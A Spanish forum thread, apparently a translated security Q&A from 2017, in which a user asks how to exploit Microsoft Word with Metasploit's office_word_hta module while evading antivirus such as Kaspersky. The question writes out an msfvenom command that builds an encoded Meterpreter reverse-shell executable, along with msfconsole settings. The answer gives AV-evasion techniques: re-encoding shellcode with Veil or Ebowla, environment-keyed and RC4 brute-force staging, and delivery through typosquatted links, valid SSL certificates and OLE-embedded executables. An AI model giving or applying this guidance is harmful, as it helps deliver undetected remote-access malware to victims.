Usando office_word_hta

-1

Estoy intentando explotar MS Word, evitando la detección de AV. Entonces, ¿qué tengo que hacer?

Primero, generar la carga útil, por ejemplo:

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 3 -o ~/payload.exe

1. ¿Qué formato de archivo debe ser? ¿exe? Si configuro "-f exe", todavía tengo que configurar el nombre "payload.exe" en lugar de "payload"?

2. ¿Cómo elegir qué codificadores usar y qué iteraciones para evitar las detecciones de AV Kaspersky, por ejemplo? Solo intente de uno a otro o qué?

Luego voy a msfconsole

msf > use exploit/windows/fileformat/office_word_hta 
msf exploit(office_word_hta) > set lhost srvhost 172.20.10.4
msf exploit(office_word_hta) > set srvhost 172.20.10.4
msf exploit(office_word_hta) > set payload generic/custom right?
then set payloadfile pointing to ~/payload.exe?
msf exploit(office_word_hta) > exploit

¿Lo estoy haciendo bien?)

    
pregunta bumblebee 14.09.2017 - 10:24
fuente

1 respuesta

0

ENCODING

Algunas cosas que podría hacer es cambiar el codificador de la carga útil: shikata_ga_nai es un método de codificación bien conocido que detectan varios AVs.

Primero, genere el código de shell sin codificar y sin procesar.

A partir de ahí, usa otro kit de herramientas (Veil 3.0 / Veil-Evasion, empty-nest, Ebowla) que tiene una gran cantidad de opciones de codificación.

También puede usar codificadores basados en contexto, que se basan en información conocida (por ejemplo, el dominio, nombre de usuario del contexto actual, creatividad): enlace enlace

Otra forma barata es codificar es cifrar 'AAAA' con RC4 u otro algoritmo criptográfico (sha-256) varias veces y hacer que Shellcode realice la misma operación y la fuerza bruta (usándolo como clave) para decodificar la carga útil por etapas:

enlace enlace

enlace

PAYLOAD

Haga su investigación! podría presentar el archivo como un archivo adjunto o enviar un enlace benigno / tipográfico y hacer que el objetivo extraiga el archivo de su servidor (cifrado con un certificado SSL válido a través de letsencrypt o msf \ impersonate_ssl).

Hay algunos desvíos, uno es que puedes incrustar un ejecutable en un documento de Microsoft Office debido a OLE: enlace

Fuera de eso, debes realmente conocer tu objetivo y esforzarte más.

    
respondido por el grepNstepN 06.10.2017 - 19:37
fuente

Lea otras preguntas en las etiquetas